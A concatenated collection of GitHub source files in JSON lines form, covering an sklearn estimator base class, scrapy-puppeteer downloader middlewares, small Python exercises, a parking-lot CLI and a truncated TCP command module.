ignore_maintenance=False)\n with pytest.raises(UnauthorizedError):\n host2.authorize(\"owner2@\", ignore_maintenance=False)\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/api/test_authorization.py","file_name":"test_authorization.py","file_ext":"py","file_size_in_byte":12306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14885882384","text":"import logging\nimport os\nimport random\nfrom datetime import datetime\n\nimport numpy as np\nimport pandas as pd\nimport sklearn\nfrom sklearn.model_selection import StratifiedKFold, cross_val_predict\n\nfrom util.caching import _s3_path, cache_forever\nfrom util.serialization import load_json\n\n\nclass BaseEstimator(sklearn.base.BaseEstimator):\n __variant__ = None\n\n # NOTE: You need to override with named parameters in order to benefit from\n # get_params() and set_params() for fit-model.\n def __init__(self):\n pass\n\n @classmethod\n def name(cls, variant=None, full=False):\n components = [_f for _f in [cls.__name__, variant or cls.__variant__] if _f]\n name = \"::\".join(components)\n if full:\n name = cls.__module__ + \".\" + name\n return name\n\n @classmethod\n def get(cls, force=False, use_s3=True, use_disk=True, use_memory=True, **kwargs):\n # FIXME: Make sure this only runs after memory cache miss.\n model = cls.__get(param_kwargs=kwargs, use_s3=use_s3, use_disk=use_disk, \n use_memory=use_memory, force=force)\n model._check_inconsistent_params(**kwargs)\n return model\n\n @classmethod\n @cache_forever\n def __get(cls, param_kwargs={}, use_s3=True, use_disk=True, use_memory=True, force=False):\n return cls.build(**param_kwargs)\n\n def _check_inconsistent_params(self, **override_kwargs):\n expected = dict(self._params_json())\n expected.update(**override_kwargs)\n expected_df = pd.DataFrame(expected.values(), index=expected.keys(), columns=[\"expected\"])\n\n actual = self.get_params()\n actual_df = pd.DataFrame(actual.values(), index=actual.keys(), columns=[\"actual\"])\n\n params_df = expected_df.merge(actual_df, how=\"outer\", validate=\"1:1\", left_index=True, right_index=True)\n params_df.drop(index=[ix for ix in params_df.index if 
ix.startswith(\"__\")], inplace=True)\n params_df[pd.isnull(params_df)] = np.nan\n inconsistent_df = params_df[(params_df[\"actual\"] != params_df[\"expected\"]) & pd.notnull(params_df[\"expected\"])]\n\n if inconsistent_df.shape[0]:\n logging.warn(\"Found inconsistent %s params:\\n%s\", self.__class__.__name__, inconsistent_df.to_string(na_rep=\"\"))\n\n return inconsistent_df\n\n @classmethod\n def build(cls, tuned=True, fit=True, goldset_kwargs={}, **param_kwargs):\n # FIXME FIXME FIXME: THIS IS A BIG HONKING BUG. Although we have param_kwargs\n # above and we get _params_json() right below, we don't pass them into the\n # constructor. THIS MEANS THAT ANY MANIPULATION WE ASSUME IN THE CONSTRUCTOR\n # DOES NOT EVER HAPPEN if it is a function of non-default parameters.\n model = cls()\n if tuned:\n params = cls._params_json()\n params.update(param_kwargs)\n params.pop(\"__score\", None)\n model.set_params(**params)\n\n if fit:\n goldset = model.goldset(**goldset_kwargs)\n # not returning X, y as expected\n # This should only happen with KeywordOverlap and TitleSimilarity\n # because their goldsets are cached\n # and it's too much of a hassle to regenerate them\n if len(goldset) != 2:\n logging.warn(\"goldset method for %s not returning X, y as expected, defaulting y to None\", cls.__name__)\n X = goldset\n y = None\n else:\n X, y = goldset\n model = model.fit(X, y)\n\n return model\n\n def fit(self, *nargs, **kwargs):\n return self._postfit()\n\n # NOTE: Must be idempotent given fit().\n def _postfit(self):\n return self\n\n @classmethod\n def goldset(cls):\n df = pd.read_csv(cls._pkg_path(\"goldsets\", \"training.tsv\"), sep=\"\\t\", encoding=\"utf-8\")\n mask = None\n pruned_df = df\n if cls._goldset_target_key() is not None:\n pruned_df = df[pd.notnull(df[cls._goldset_target_key()])]\n if pruned_df.shape[0] < df.shape[0]:\n pruned_pct = 1.000 - pruned_df.shape[0] / float(df.shape[0])\n if pruned_pct >= 0.250:\n level = logging.CRITICAL\n elif pruned_pct >= 0.100:\n level = logging.ERROR\n else:\n level = logging.WARNING\n logging.log(level, \"Dropped {:.1%} of {:} goldset\".format(pruned_pct, cls.__name__))\n\n X = pruned_df\n y = None\n if cls._goldset_target_key() is not None:\n X = pruned_df[[c for c in df if c != cls._goldset_target_key()]]\n y = pruned_df[cls._goldset_target_key()]\n\n if hasattr(cls, \"_preprocess_X\"):\n X = cls._preprocess_X(X)\n if hasattr(cls, \"_preprocess_y\"):\n y = cls._preprocess_X(y)\n return X, y\n\n @classmethod\n def _goldset_kwargs(cls):\n return {}\n\n @classmethod\n def _goldset_target_key(cls):\n return NotImplementedError()\n\n @classmethod\n def _raw_scorer(cls, estimator, X, y):\n return estimator.score(X, y)\n\n @classmethod\n def _cv_scorer(cls, estimator, X, y_gold, random_state=None):\n y_pred = cls._cv_predict(estimator, X, y_gold, random_state=random_state)\n score = cls._metric_score(y_gold, y_pred)\n return score\n\n @classmethod\n def _cv_predict(cls, estimator, X, y_gold, random_state=None):\n if random_state is not None:\n random.seed(random_state)\n np.random.seed(random_state)\n y_pred = cross_val_predict(estimator, X, y_gold, n_jobs=1, cv=estimator._cv_splitter(random_state=random_state))\n return y_pred\n\n @classmethod\n def _cv_splitter(cls, n_splits=5, random_state=None):\n # FIXME: shuffle=True may be introducing noise between splits. 
Turning\n # off causes some weird, unexplained (but reproducible) exception.\n #\n # File \"/Users/kushalc/Dropbox/TalentWorks/backend-github/postings/specialty_classifier.py\", line 79, in predict\n # y[mask] = model.predict(O[mask])\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/utils/metaestimators.py\", line 54, in \n # out = lambda *args, **kwargs: self.fn(obj, *args, **kwargs)\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/pipeline.py\", line 326, in predict\n # Xt = transform.transform(Xt)\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/pipeline.py\", line 766, in transform\n # for name, trans, weight in self._iter())\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/preprocessing/data.py\", line 1344, in normalize\n # estimator='the normalize function', dtype=FLOAT_DTYPES)\n # File \"/usr/local/lib/python2.7/site-packages/sklearn/utils/validation.py\", line 416, in check_array\n # context))\n # ValueError: Found array with 0 sample(s) (shape=(0, 172)) while a minimum of 1 is required by the normalize function.\n #\n # NOTE: Switching to RepeatedStratifiedKFold, etc. or anything else that repeats the testset will result in errors\n # given blended use of cross_val_predict and _metric_score above.\n return StratifiedKFold(shuffle=True, n_splits=n_splits, random_state=random_state)\n\n @classmethod\n def _cache_path(cls, method=None, dt=None, format=\"cloudpickle\", **kwargs):\n if method is None:\n method = cls.get\n cached_path = _s3_path(cls.__module__, method, [cls, cls.__variant__], kwargs,\n dt=dt, format=format)\n return cached_path\n\n @classmethod\n def _pkg_path(cls, package, filename, cls_name=None):\n if not cls_name:\n cls_name = cls.name(full=True)\n rpath = os.path.join(cls_name, filename)\n apath = os.path.join(package, rpath)\n return apath\n\n @classmethod\n def _params_json(cls, name=\"base\"):\n # NOTE: This will barf if it can't find the PARAMS_JSON file. After the\n # spaCy debacle of Feb 2017, this is desired. 
We only want tuned models.\n return load_json(cls._params_path(name))\n\n @classmethod\n def _params_path(cls, name=\"base\"):\n return cls._pkg_path(\"parameters\", \"%s.json\" % name)\n\n @classmethod\n def _tmp_path(cls):\n path = os.path.join(os.environ[\"APP_ROOT\"], \"tmp\", datetime.now().strftime(\"%Y-%m-%d\"),\n cls.__module__ + \".\" + cls.__name__)\n if not os.path.exists(path):\n os.makedirs(path)\n return path\n","repo_name":"kushalc/coreutils","sub_path":"util/estimator/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30785536175","text":"import json\nimport logging\nfrom collections import defaultdict\nfrom typing import List, Union\nfrom urllib.parse import urlencode, urljoin\n\nfrom scrapy import Request, signals\nfrom scrapy.crawler import Crawler\nfrom scrapy.exceptions import IgnoreRequest, NotConfigured\nfrom scrapy.http import Headers, TextResponse\n\nfrom scrapypuppeteer.actions import Click, GoBack, GoForward, GoTo, RecaptchaSolver, Screenshot, Scroll, CustomJsAction\nfrom scrapypuppeteer.response import PuppeteerResponse, PuppeteerHtmlResponse, PuppeteerScreenshotResponse, PuppeteerJsonResponse\nfrom scrapypuppeteer.request import ActionRequest, PuppeteerRequest\n\n\nclass PuppeteerServiceDownloaderMiddleware:\n \"\"\"\n This downloader middleware converts PuppeteerRequest instances to\n Puppeteer service API requests and then converts its responses to\n PuppeteerResponse instances. Additionally, it tracks all browser contexts\n that spider uses and performs cleanup request to service once spider\n is closed.\n\n Additionally, the middleware uses these meta-keys, do not use them, because their changing\n could possibly (almost probably) break determined behaviour:\n 'puppeteer_request', 'dont_obey_robotstxt', 'proxy'\n\n Settings:\n\n PUPPETEER_SERVICE_URL (str)\n Service URL, e.g. 
'http://localhost:3000'\n\n PUPPETEER_INCLUDE_HEADERS (bool|list[str])\n Determines which request headers will be sent to remote site by puppeteer service.\n Either True (all headers), False (no headers) or list of header names.\n May be overriden per request.\n By default, only cookies are sent.\n\n PUPPETEER_INCLUDE_META (bool)\n Determines whether to send or not user's meta attached by user.\n Default to False.\n \"\"\"\n\n SERVICE_URL_SETTING = 'PUPPETEER_SERVICE_URL'\n INCLUDE_HEADERS_SETTING = 'PUPPETEER_INCLUDE_HEADERS'\n SERVICE_META_SETTING = 'PUPPETEER_INCLUDE_META'\n DEFAULT_INCLUDE_HEADERS = ['Cookie'] # TODO send them separately\n\n def __init__(self,\n crawler: Crawler,\n service_url: str,\n include_headers: Union[bool, List[str]],\n include_meta: bool):\n self.service_base_url = service_url\n self.include_headers = include_headers\n self.include_meta = include_meta\n self.crawler = crawler\n self.used_contexts = defaultdict(set)\n\n @classmethod\n def from_crawler(cls, crawler):\n service_url = crawler.settings.get(cls.SERVICE_URL_SETTING)\n if service_url is None:\n raise ValueError('Puppeteer service URL must be provided')\n if cls.INCLUDE_HEADERS_SETTING in crawler.settings:\n try:\n include_headers = crawler.settings.getbool(cls.INCLUDE_HEADERS_SETTING)\n except ValueError:\n include_headers = crawler.settings.getlist(cls.INCLUDE_HEADERS_SETTING)\n else:\n include_headers = cls.DEFAULT_INCLUDE_HEADERS\n include_meta = crawler.settings.getbool(cls.SERVICE_META_SETTING, False)\n middleware = cls(crawler, service_url, include_headers, include_meta)\n crawler.signals.connect(middleware.close_used_contexts,\n signal=signals.spider_closed)\n return middleware\n\n def process_request(self, request, spider):\n if not isinstance(request, PuppeteerRequest):\n return\n\n action = request.action\n service_url = urljoin(self.service_base_url, action.endpoint)\n service_params = self._encode_service_params(request)\n if service_params:\n service_url += '?' 
+ service_params\n\n meta = {\n 'puppeteer_request': request,\n 'dont_obey_robotstxt': True,\n 'proxy': None\n }\n if self.include_meta:\n meta = {\n **request.meta,\n **meta\n }\n\n return ActionRequest(\n url=service_url,\n action=action,\n method='POST',\n headers=Headers({'Content-Type': action.content_type}),\n body=self._serialize_body(action, request),\n dont_filter=True,\n cookies=request.cookies,\n priority=request.priority,\n callback=request.callback,\n cb_kwargs=request.cb_kwargs,\n errback=request.errback,\n meta=meta\n )\n\n @staticmethod\n def _encode_service_params(request):\n service_params = {}\n if request.context_id is not None:\n service_params['contextId'] = request.context_id\n if request.page_id is not None:\n service_params['pageId'] = request.page_id\n if request.close_page:\n service_params['closePage'] = 1\n return urlencode(service_params)\n\n def _serialize_body(self, action, request):\n payload = action.payload()\n if action.content_type == 'application/json':\n if isinstance(payload, dict):\n # disallow null values in top-level request parameters\n payload = {k: v for k, v in payload.items() if v is not None}\n proxy = request.meta.get('proxy')\n if proxy:\n payload['proxy'] = proxy\n include_headers = self.include_headers if request.include_headers is None else request.include_headers\n if include_headers:\n headers = request.headers.to_unicode_dict()\n if isinstance(include_headers, list):\n headers = {h.lower(): headers[h] for h in include_headers if h in headers}\n payload['headers'] = headers\n return json.dumps(payload)\n return str(payload)\n\n def process_response(self, request, response, spider):\n if not isinstance(response, TextResponse):\n return response\n\n puppeteer_request = request.meta.get('puppeteer_request')\n if puppeteer_request is None:\n return response\n\n if b'application/json' not in response.headers.get(b'Content-Type', b''):\n return response.replace(request=request)\n\n response_data = json.loads(response.text)\n response_cls = self._get_response_class(puppeteer_request.action)\n\n if response.status != 200:\n context_id = response_data.get('contextId')\n if context_id:\n self.used_contexts[id(spider)].add(context_id)\n return response\n\n return self._form_response(response_cls, response_data,\n puppeteer_request.url, request, puppeteer_request,\n spider)\n\n def _form_response(self, response_cls, response_data,\n url, request, puppeteer_request,\n spider):\n context_id = response_data.pop('contextId', puppeteer_request.context_id)\n page_id = response_data.pop('pageId', puppeteer_request.page_id)\n\n attributes = dict()\n for attr in response_cls.attributes:\n if attr in response_data:\n attributes[attr] = response_data.pop(attr)\n if response_data:\n attributes['data'] = response_data\n\n self.used_contexts[id(spider)].add(context_id)\n\n return response_cls(\n url=url,\n puppeteer_request=puppeteer_request,\n context_id=context_id,\n page_id=page_id,\n request=request,\n **attributes\n )\n\n @staticmethod\n def _get_response_class(request_action):\n if isinstance(request_action, (GoTo, GoForward, GoBack, Click, Scroll)):\n return PuppeteerHtmlResponse\n if isinstance(request_action, Screenshot):\n return PuppeteerScreenshotResponse\n return PuppeteerJsonResponse\n\n def close_used_contexts(self, spider):\n contexts = list(self.used_contexts[id(spider)])\n if contexts:\n request = Request(urljoin(self.service_base_url, '/close_context'),\n method='POST',\n headers=Headers({'Content-Type': 'application/json'}),\n 
meta={\"proxy\": None},\n body=json.dumps(contexts))\n return self.crawler.engine.downloader.fetch(request, None)\n\n\nclass PuppeteerRecaptchaDownloaderMiddleware:\n \"\"\"\n This middleware is supposed to solve recaptcha on the page automatically.\n If there is no captcha on the page then this middleware will do nothing\n on the page, so your 2captcha balance will remain the same.\n It can submit recaptcha if \"submit button\" is provided.\n It will not \"submit\" captcha if there is no submit-selector.\n\n If you want to turn Recaptcha solving off on the exact request provide\n meta-key 'dont_recaptcha' with True value. The middleware will skip the request\n through itself.\n\n The middleware uses additionally these meta-keys, do not use them, because their changing\n could possibly (almost probably) break determined behaviour:\n '_captcha_submission', '_captcha_solving'\n\n Settings:\n\n RECAPTCHA_ACTIVATION: bool = True - activates or not the middleware (if not - raises NotConfigured)\n RECAPTCHA_SOLVING: bool = True - whether solve captcha automatically or not\n RECAPTCHA_SUBMIT_SELECTORS: str | dict = {} - dictionary consisting of domains and\n these domains' submit selectors, e.g.\n 'www.google.com/recaptcha/api2/demo': '#recaptcha-demo-submit'\n it could be also squeezed to\n 'ecaptcha/api2/de': '#recaptcha-demo-submit'\n also you can use not just strings but Click actions with required parameters:\n 'ogle.com/recaptcha': Click('#recaptcha-demo-submit')\n In general - domain is a unique identifying string which is contained in web-page url\n If there is no button to submit recaptcha then provide empty string to a domain.\n This setting can also be a string. If so the middleware will only click the button\n related to this selector.\n This setting can also be unprovided. 
In this case every web-page you crawl is supposed to be\n without submit button, or you manually do it yourself.\n \"\"\"\n\n MIDDLEWARE_ACTIVATION_SETTING = \"RECAPTCHA_ACTIVATION\"\n RECAPTCHA_SOLVING_SETTING = \"RECAPTCHA_SOLVING\"\n SUBMIT_SELECTORS_SETTING = \"RECAPTCHA_SUBMIT_SELECTORS\"\n\n def __init__(self,\n recaptcha_solving: bool,\n submit_selectors: dict):\n self.submit_selectors = submit_selectors\n self.recaptcha_solving = recaptcha_solving\n self._page_responses = dict()\n self._page_closing = set()\n\n @classmethod\n def from_crawler(cls, crawler: Crawler):\n activation = crawler.settings.get(cls.MIDDLEWARE_ACTIVATION_SETTING, True)\n if not activation:\n raise NotConfigured\n recaptcha_solving = crawler.settings.get(cls.RECAPTCHA_SOLVING_SETTING, True)\n\n try:\n submit_selectors = crawler.settings.getdict(cls.SUBMIT_SELECTORS_SETTING, dict())\n except ValueError:\n submit_selectors = {'': crawler.settings.get(cls.SUBMIT_SELECTORS_SETTING, '')}\n except Exception as exception:\n raise ValueError(f\"Wrong argument(s) inside {cls.SUBMIT_SELECTORS_SETTING}: {exception}\")\n\n for key in submit_selectors.keys():\n submit_selector = submit_selectors[key]\n if isinstance(submit_selector, str):\n submit_selectors[key] = Click(selector=submit_selector)\n elif not isinstance(submit_selector, Click):\n raise ValueError(\"Submit selector must be str or Click,\"\n f\"but {type(submit_selector)} provided\")\n return cls(recaptcha_solving, submit_selectors)\n\n def process_request(self, request, spider):\n if request.meta.get('dont_recaptcha', False):\n return None\n\n if isinstance(request, PuppeteerRequest):\n if request.close_page and not request.meta.get('_captcha_submission', False):\n request.close_page = False\n request.dont_filter = True\n self._page_closing.add(request)\n return request\n return None\n\n def process_response(self,\n request, response,\n spider):\n if not isinstance(response, PuppeteerResponse): # We only work with PuppeteerResponses\n return response\n\n if request.meta.get('dont_recaptcha', False): # Skip such responses\n return response\n\n if request.meta.pop('_captcha_submission', False): # Submitted captcha\n return self.__gen_response(response)\n\n if request.meta.pop('_captcha_solving', False):\n # RECaptchaSolver was called by recaptcha middleware\n return self._submit_recaptcha(request, response, spider)\n\n if isinstance(response.puppeteer_request.action,\n (Screenshot, Scroll, CustomJsAction, RecaptchaSolver)):\n # No recaptcha after this action\n return response\n\n # Any puppeteer response besides RecaptchaSolver's PuppeteerResponse\n return self._solve_recaptcha(response)\n\n def _solve_recaptcha(self, response):\n self._page_responses[response.page_id] = response # Saving main response to return it later\n\n recaptcha_solver = RecaptchaSolver(solve_recaptcha=self.recaptcha_solving,\n close_on_empty=self.__is_closing(response, remove_request=False))\n return response.follow(recaptcha_solver,\n meta={'_captcha_solving': True},\n close_page=False)\n\n def _submit_recaptcha(self, request, response, spider):\n response_data = response.data\n if not response.puppeteer_request.action.solve_recaptcha:\n spider.log(message=f\"Found {len(response_data['recaptcha_data']['captchas'])} captcha \"\n f\"but did not solve due to argument\",\n level=logging.INFO)\n return self.__gen_response(response)\n # Click \"submit button\"?\n if response_data['recaptcha_data']['captchas'] and self.submit_selectors:\n # We need to click \"submit button\"\n for domain, 
submitting in self.submit_selectors.items():\n if domain in response.url:\n if not submitting.selector:\n return self.__gen_response(response)\n return response.follow(action=submitting,\n callback=request.callback,\n errback=request.errback,\n close_page=self.__is_closing(response),\n meta={'_captcha_submission': True})\n raise IgnoreRequest(\"No submit selector found to click on the page but captcha found\")\n return self.__gen_response(response)\n\n def __gen_response(self, response):\n main_response_data = dict()\n main_response_data['page_id'] = None if self.__is_closing(response) else response.puppeteer_request.page_id\n\n main_response = self._page_responses.pop(response.page_id)\n\n if isinstance(main_response, PuppeteerHtmlResponse):\n if isinstance(response.puppeteer_request.action, RecaptchaSolver):\n main_response_data['body'] = response.data['html']\n elif isinstance(response.puppeteer_request.action, Click):\n main_response_data['body'] = response.body\n\n return main_response.replace(**main_response_data)\n\n def __is_closing(self, response,\n remove_request: bool = True) -> bool:\n main_request = self._page_responses[response.page_id].puppeteer_request\n close_page = main_request in self._page_closing\n if close_page and remove_request:\n self._page_closing.remove(main_request)\n return close_page\n","repo_name":"ispras/scrapy-puppeteer","sub_path":"scrapypuppeteer/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":16066,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"3"} +{"seq_id":"12996412937","text":"\n# Hãy đưa số 1 về đầu List\n\nfrom random import *\n\ndef Tao_Lst(lst, n):\n for i in range(n):\n lst.append(randrange(0, 9))\n return lst\n\ndef Chuyen_Dau(lst):\n vt = 0\n for i in range(1, len(lst)):\n if lst[i] == 1:\n lst[vt] = lst[vt] + lst[i]\n lst[i] = lst[vt] - lst[i]\n lst[vt] = lst[vt] - lst[i]\n vt += 1\n return lst\n\nlst = []\nn = int(input('Nhập số lượng phần tử của List: '))\nprint('List vừa đc tạo là: ', Tao_Lst(lst, n))\nprint('List sau khi chuyển 1 lên đầu: ', Chuyen_Dau(lst))\n\n","repo_name":"HuynhLoc19/New_Git","sub_path":"Bai_150.py","file_name":"Bai_150.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9093785054","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 12 16:56:38 2019\n\n@author: leyv\n\"\"\"\n\n\nimport re\n\nfilename = 'trec/04数据集/04.testset'\nfile = open(filename)\nqu_set = str(file.read())\n#print(qu_set)\nfile.close()\nraw_list = qu_set.split('')\n\n\n\n#print(raw_list[9])\n'''\nnum_r = re.compile(r'(\\n?)(.*)\\n')\ntest_str = \"<title>\\nU.S. ethnic population\\n\\n<desc> Description: \"\ntest_str = \"<title>\\nU.S. 
ethnic population\\n\\n<desc> Description: \"\nprint(test_str)\nnum_object = re.search(num_r, test_str)# num_r.match(raw_item)\n\nprint(num_object.group(2) )\n\n'''\n\nnum_r = re.compile(r'Number:(.*)\\n')\ntitle_r = re.compile(r'<title>(\\n?)([\\d\\D]*)\\n<desc>')\ndesc_r = re.compile(r'<desc>(\\n?)([\\d\\D]*)\\n<narr>')\nnarr_r = re.compile(r'<narr>(\\n?)([\\d\\D]*)')\n\n\nqu_list = []\nfor raw_item in raw_list[:-1]:\n qu_dict = {}\n print(raw_item)\n num_object = re.search(num_r, raw_item)# num_r.match(raw_item)\n qu_dict['index'] = num_object.group(1).strip()\n \n title_object = re.search(title_r, raw_item)\n qu_dict['title'] = title_object.group(2).replace('\\n',' ').strip()\n \n desc_object = re.search(desc_r, raw_item)\n qu_dict['desc'] = desc_object.group(2).replace('Description:','').replace('\\n',' ').strip()\n \n narr_object = re.search(narr_r, raw_item)\n qu_dict['narr'] = narr_object.group(2).replace('Narrative:','').replace('\\n',' ').strip()\n qu_dict['content'] = qu_dict['title'] + '. ' + qu_dict['desc'] + '. ' + qu_dict['narr'].split(\". \")[0] + '.'\n \n qu_list.append(qu_dict)\nprint(len(raw_list))\nprint(raw_list[0])\nprint(qu_list[0])\n","repo_name":"malajuanxiao/TextRank_Extend_Block_TSM_ForSearch","sub_path":"python_index_snippet/fetch_qu.py","file_name":"fetch_qu.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33298813930","text":"import utils\nimport constants\n\nDATASET_VERSION = 'v1'\n\nfor trait_name in constants.TRAITS:\n df, _, indices, _ = utils.read_data(DATASET_VERSION,\n 'all',\n trait_name)\n data = df.loc[indices][trait_name]\n print(f'=== {trait_name.upper()} ===')\n if len(data) == 0:\n print(' EMPTY')\n else:\n print(f' count: {len(data):.2f}')\n print(f' mean: {data.mean():.2f}')\n print(f' median: {data.median():.2f}')\n print(f' std: {data.std():.2f}')\n","repo_name":"ashwhall/hyperspec-trait-prediction","sub_path":"src/dataset/print_dataset_stats.py","file_name":"print_dataset_stats.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"25220136084","text":"from parkinglot import Parking_lot\nimport argparse\n\n\nclass Parking_Commands(Parking_lot):\n def show(self, line):\n if line.startswith(\"create_parking_lot\"):\n num = int(line.split(' ')[1])\n res = self.create_parking_space(num)\n print('Created a parking lot with '+str(res)+' slots')\n\n elif line.startswith('park'):\n reg_no = line.split(' ')[1]\n colour = line.split(' ')[2]\n res = self.parking_of_vehicle(reg_no, colour)\n if res == -1:\n print(\"Sorry, parking lot is full\")\n else:\n print('Allocated slot number: '+str(res))\n\n elif line.startswith('leave'):\n leave_slot_id = int(line.split(' ')[1])\n status = self.leave_parking(leave_slot_id)\n if status == -1:\n print('Slot number '+str(leave_slot_id)+' is not available')\n elif status:\n print('Slot number '+str(leave_slot_id)+' is free')\n else:\n print('Slot number '+str(leave_slot_id)+' is already free')\n\n elif line.startswith('status'):\n self.show_all_parked_cars()\n\n elif line.startswith('registration_numbers_for_cars_with_colour'):\n colour = line.split(' ')[1]\n regnos = self.get_regno_of_all_car_by_colour(colour)\n print(', '.join(regnos))\n\n elif line.startswith('slot_numbers_for_cars_with_colour'):\n colour = line.split(' ')[1]\n slotnos = self.get_slot_no_of_all_car_by_colour(colour)\n print(', 
'.join(slotnos))\n\n elif line.startswith('slot_number_for_registration_number'):\n reg_no = line.split(' ')[1]\n slotno = self.get_slot_no_by_registration_no(reg_no)\n if slotno == -1:\n print(\"Not found\")\n else:\n print(slotno)\n\n elif line.startswith('exit'):\n print(\"Thank You!! For Using Our Parking Lot\")\n exit(0)\n\n def main(self):\n parkinglot = Parking_Commands()\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', dest='srcfile', help=\"Input\")\n args = parser.parse_args()\n\n if args.srcfile:\n with open(args.srcfile) as f:\n for line in f:\n line = line.rstrip('\\n')\n parkinglot.show(line)\n else:\n while True:\n line = input(\"$ \")\n parkinglot.show(line)\n\n\nif __name__ == '__main__':\n run_parking = Parking_Commands()\n print(\"Welcome To Our Parking Lot\")\n run_parking.main()\n","repo_name":"mdasifraza/python_parking_lot_project","sub_path":"park_command.py","file_name":"park_command.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40825237490","text":"#модуль с командами\nfrom typing import List, Tuple, Dict, Optional, Union\nimport struct\nimport socket\n\nfrom tcp_client import Connection\n\n\nclass Command(object):\n def __init__(self, *, number: int = None, name: str = None):\n self.init_err_info: Optional[str] = None\n self.header: Optional[bytes] = None\n self.is_there_info_field: Optional[bool] = None\n self.is_there_data_field_in_response: Optional[bool] = None\n if number == 0: #in boolean expression 0 equals None. It can confuse a lot \n self.init_err_info = ('Wrong command number! '\n +'0 is forbidden value for a command number')\n print(self.init_err_info)\n return\n if not number: #init by name\n self.name = name\n self.number = command_num_from_name(name)\n if not self.number:\n self.init_err_info = (\n f'Command by the name of \"{name}\" was not found')\n print(self.init_err_info)\n return\n if not name: #init by number\n if type(number) != int:\n self.init_err_info = (\n 'Wrong command number! Command number must be an integer')\n print(self.init_err_info)\n return\n self.number = number\n self.name = command_name_from_num(number)\n if not self.name:\n self.init_err_info = (\n f'Command by the number of {number} was not found')\n print(self.init_err_info)\n return\n if number and name:\n self.init_err_info = (\n 'Unexpected command constructor args! '\n +'Either number or name should be provided. 
Not both of them')\n print(self.init_err_info)\n return\n # if __init__ err_info is empty then \"command\" instance should be \n # constructed and it should has proper command_name and command_number\n\n def __str__(self) -> str:\n return f'--- Command \"{self.name}\" (number {self.number})'\n\n '''def command_header_from_name(self) -> bytes:\n for command_tuple in command_info_list:\n return command_tuple[2] if command_tuple[1] == self.number else None'''\n\n def make_bytes_message(self, *info_field_params) -> bytes:\n for command_tuple in command_info_list:\n if command_tuple[1] == self.number:\n self.is_there_info_field: bool = command_tuple[3]\n self.header: bytes = bytes(command_tuple[2]) #NEED TESTING\n if not self.is_there_info_field: #если у команды нет \"информационного поля\"\n bytes_message = self.header\n elif self.is_there_info_field: #если у команды есть \"информационное поле\"\n info_field: Optional[bytes] = None\n if self.number == 61:\n info_field = reflector_motor_open_info(\n self.name, *info_field_params)\n if self.number == 71:\n info_field = reflector_motor_close_info(\n self.name, *info_field_params)\n if self.number == 102:\n info_field = bench_tension_setup_info(\n self.name, *info_field_params)\n if self.number == 112:\n info_field = bench_motor_open_info(\n self.name, *info_field_params)\n if self.number == 122:\n info_field = bench_motor_close_info(\n self.name, *info_field_params)\n if self.number == 132:\n info_field = bench_motor_tension_setup_info(\n self.name, *info_field_params)\n if self.number == 143:\n info_field = get_sensor_value_info(\n self.name, *info_field_params)\n if not info_field: #если инф. поле так и не сформировалось\n print('info_field was not formed')\n return\n bytes_message = concatenate_bytes(self.header, info_field)\n return bytes_message\n\n def check_response(self, actual_response: bytes) -> bool:\n if self.number == 143:\n is_command_succ = check_get_sensor_value(actual_response)\n elif self.number == 153:\n is_command_succ = check_get_all_sensors_values(actual_response)\n else: #standard response (without info_field)\n for command_tuple in command_info_list:\n if command_tuple[1] == self.number:\n command_code_in_header: int = int(bytearray(command_tuple[2])[1])\n ideal_response: bytearray = standard_response\n ideal_response[1] = command_code_in_header\n is_command_succ = actual_response == ideal_response \n return is_command_succ\n\n def send_and_check(\n self, conn: socket.socket, *info_field_params,\n get_response: bool = False) -> Union[Tuple[bool, bytes], bool]:\n message: bytes = self.make_bytes_message(*info_field_params)\n if not conn: \n print('No connection. Make connection first.')\n return\n if not message: \n print('Bytes message was not formed')\n return\n response: bytes = conn.send_message(message)\n is_command_succ = self.check_response(response)\n if not is_command_succ: \n print(f'WARNING! 
Command {self.name} have not worked properly')\n return (is_command_succ, response) if get_response else is_command_succ \n\n def decode_response_data(self, response: bytes) -> Optional[Tuple[int, ...]]:\n btray_response = bytearray(response)\n for command_tuple in command_info_list:\n if command_tuple[1] == self.number:\n self.is_there_data_field_in_response: bool = command_tuple[4]\n if not self.is_there_data_field_in_response:\n print(\"You've tried to decode data_field of the command which \"\n + \" doesn't have any data_field\")\n return\n elif self.is_there_data_field_in_response:\n if self.number == 143:\n data_field = btray_response[6:]\n if len(data_field) != 5:\n print('Wrong data_field length in response '\n +f'for \"{self.name}\" command.')\n decoded_response_data = tuple(struct.unpack('=Bl', data_field))\n if self.number == 153:\n data_field = btray_response[6:]\n if len(data_field) != 104:\n print('Wrong data_field length in response '\n + f'for \"{self.name}\" command.')\n decoded_response_data = tuple(struct.unpack('l'*26, data_field))\n return decoded_response_data\n#-------------------------функции для класса команд---------------------\n\ndef command_num_from_name(name: str) -> Optional[int]:\n for command_tuple in command_info_list:\n if command_tuple[0] == name:\n return command_tuple[1]\n\ndef command_name_from_num(number: int) -> Optional[str]:\n for command_tuple in command_info_list:\n if command_tuple[1] == number:\n return command_tuple[0]\n\ndef concatenate_bytes(bytes_1: bytes, bytes_2: bytes) -> bytes:\n # NEED TESTING\n return bytes(bytearray(bytes_1) + 